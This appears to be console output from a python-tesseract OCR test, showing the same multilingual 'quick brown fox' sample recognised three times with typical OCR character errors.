retStr length=422
result(ProcessPagesRaw) The (quick) [brown] {fox} jumps!
Over the $43,456.78 <lazy> #90 dog
& duck/goose, as 12.5% of E-mail
from is spam.
Der ,,schnelle” braune Fuchs springt
iiber den faulen Hund. Le renard brun
«rapide» saute par-dessus le chien
paresseux. La volpe marrone rapida
salta sopra i] cane pigro. El zorro
marrén répido salta sobre el perro
perezoso. A raposa marrom rapida
salta sobre 0 C50 preguicoso.

result(ProcessPagesBuffer)= The (quick) [brown] {fox} jumps!
Over the $43,456.78 <lazy> #90 dog
& duck/goose, as 12.5% of E-mail
from is spam.
Der ,,schnelle” braune Fuchs springt
iiber den faulen Hund. Le renard brun
«rapide» saute par-dessus le chien
paresseux. La volpe marrone rapida
salta sopra i] cane pigro. El zorro
marrén répido salta sobre el perro
perezoso. A raposa marrom rapida
salta sobre 0 C50 preguicoso.

user@server:~/python-tesseract/src/test$ python
The (quick) [brown] {fox} jumps!
Over the $43,456.78 <lazy> #90 dog
& duck/goose, as 12.5% of E-mail
from is spam.
Der ,,schnelle” braune Fuchs springt
fiber den faulen Hund. Le renard brun
«rapide» saute par-dessus le chien
paresseux. La volpe marrone rapida
salta sopra i] cane pigro. El zorro
marrén répido salta sobre el perro
perezoso. A raposa marrom répida
salta sobre 0 C50 preguieoso.